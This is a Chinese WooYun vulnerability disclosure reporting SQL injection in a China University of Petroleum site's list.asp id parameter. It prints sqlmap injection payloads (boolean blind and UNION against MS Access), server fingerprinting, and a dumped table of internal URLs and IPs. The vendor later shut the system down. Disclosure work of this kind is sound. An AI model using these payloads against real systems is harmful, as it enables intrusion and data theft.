当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159862

漏洞标题:中国石油大学某站sql注入漏洞

相关厂商:中国石油大学

漏洞作者: 恋锋

提交时间:2015-12-10 12:17

修复时间:2015-12-14 15:30

公开时间:2015-12-14 15:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-10: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-14: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

中国石油大学某站sql注入漏洞

详细说明:

1、存在漏洞的站点

http://ccce.upc.edu.cn/shiyan/list.asp?id=895


2、可注入参数:id
3、已获取数据库部分数据
a.数据库类型

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=895 AND 3387=3387
Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: id=-2971 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(118)&CHR(120)&CHR(107)&CHR(113)&CHR(109)&CHR(70)&CHR(82)&CHR(75)&CHR(117)&CHR(102)&CHR(88)&CHR(122)&CHR(75)&CHR(122)&CHR(113)&CHR(118)&CHR(106)&CHR(106)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---


b.部分表及表数据

---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[1 table]
+-----+
| url |
+-----+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---


Table: url
[10 entries]
+----+-------------------------------------------------------------------------------------+------+-------------------+
| id | url | data | title |
+----+-------------------------------------------------------------------------------------+------+-------------------+
| 53 | http://202.194.153.254:8080/ | <blank> | V\\?feNf |
| 54 | http://jwc.hdpu.edu.cn/jwc/ | <blank> | eYR\\?a1Y\x04 |
| 56 | http://rsc.hdpu.edu.cn/ | <blank> | N\\?baN\\?8bY\x04 |
| 58 | http://202.194.144.6/cwcx.asp?classid=52&classLevel=firstClass | <blank> | <blank> |
| 59 | http://gs.hdpu.edu.cn/ | <blank> | x\x14zvu\x1f |
| 60 | http://www.upc.edu.cn/ | <blank> | [fh!N; |
| 63 | http://202.194.145.242/blogcmmt/sheduls/tasklistform.php?op=calclist&dmid=upcoffice | <blank> | [fh!e\\?e5S\\?86 |
| 64 | http://wlzx.hdpu.edu.cn/upc/kjc/ | <blank> | y\\?d1b\\?80Y\x04 |
| 65 | http://bbs.hdpu.edu.cn/ | <blank> | <blank> |
| 66 | http://news.upc.edu.cn/nettv.htm | <blank> | \x7fQ~\\?dcu5 |
+----+-------------------------------------------------------------------------------------+------+-------------------+

漏洞证明:

参见详细说明

修复方案:

对输入内容严格过滤

版权声明:转载请注明来源 恋锋@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-12-14 15:29

厂商回复:

系统已经关停

最新状态:

2015-12-14:系统已经关停,感谢您对中国石油大学网络信息的关注。